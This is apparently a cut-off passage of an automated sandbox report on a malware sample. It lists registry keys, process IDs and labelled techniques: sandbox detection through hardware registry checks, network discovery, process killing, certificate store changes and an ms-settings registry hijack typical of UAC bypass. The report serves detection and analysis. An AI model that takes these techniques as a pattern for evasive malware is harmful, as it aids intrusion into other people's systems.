\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stories.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vg9qcBa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7mpPLxE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VBVEd6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shineencoder32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2228 PING.EXE 5284 PING.EXE 14576 PING.EXE 1172 PING.EXE 6788 PING.EXE 2100 PING.EXE 5744 PING.EXE 2316 PING.EXE 5372 PING.EXE 11552 Process not Found 10600 Process not Found 4352 PING.EXE 1692 PING.EXE 10516 PING.EXE 10244 Process not Found 5520 PING.EXE 5684 PING.EXE 2672 PING.EXE 5528 PING.EXE 4952 cmd.exe 5160 PING.EXE 5444 PING.EXE 1988 PING.EXE 1332 PING.EXE 15372 Process not Found 3712 PING.EXE 5988 PING.EXE 3688 PING.EXE 3724 PING.EXE 1688 PING.EXE 4948 PING.EXE 5732 PING.EXE 1624 PING.EXE 2648 PING.EXE 10756 Process not Found 5728 PING.EXE 3184 PING.EXE 13244 Process not Found 9348 Process not Found 1816 PING.EXE 1412 PING.EXE 3416 PING.EXE 632 PING.EXE 6712 PING.EXE 18224 Process not Found 336 Process not Found 724 PING.EXE 5244 PING.EXE 5224 cmd.exe 3064 PING.EXE 5656 PING.EXE 4468 PING.EXE 5904 cmd.exe 3816 PING.EXE 2072 PING.EXE 2340 PING.EXE 3648 PING.EXE 2036 PING.EXE 3964 PING.EXE 9776 Process not Found 13752 Process not Found 9392 Process not Found 5768 PING.EXE 2060 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000025e0c-454.dat nsis_installer_2 behavioral2/files/0x001b00000002aab5-1579.dat nsis_installer_1 behavioral2/files/0x001b00000002aab5-1579.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Driver wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe -
Checks processor information in registry 2 TTPs 48 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nwdzwk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz nwdzwk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 12868 timeout.exe 18340 timeout.exe 10708 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 440 wmic.exe -
Discovers systems in the same network 1 TTPs 5 IoCs
pid Process 2688 net.exe 1112 net.exe 684 net.exe 17592 net.exe 2384 net.exe -
Enumerates system info in registry 2 TTPs 55 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 7 IoCs
pid Process 11808 Process not Found 11952 Process not Found 18364 Process not Found 13016 Process not Found 12864 Process not Found 1812 taskkill.exe 4216 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\50e68717_0 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\50e68717_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_8086&dev_0022&subsys_80860022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\a\\41m98slk.exe%b{00000000-0000-0000-0000-000000000000}" svchost.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 6386afbd6140db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 2d40da716140db01 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 9a5c05856140db01 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 1a50bf986140db01 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = ca23f3cf6140db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 09f5018b6240db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = e19fdb646240db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 7d0fd75f6140db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = bd6fb9b46240db01 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 639010e26140db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 104a541a6240db01 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = 3adbe1526240db01 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-08-1f-68-24-cc\WpadDecisionTime = ba7cb5776240db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe -
Modifies registry class 34 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\ms-settings\Shell\Open reg.exe Key created 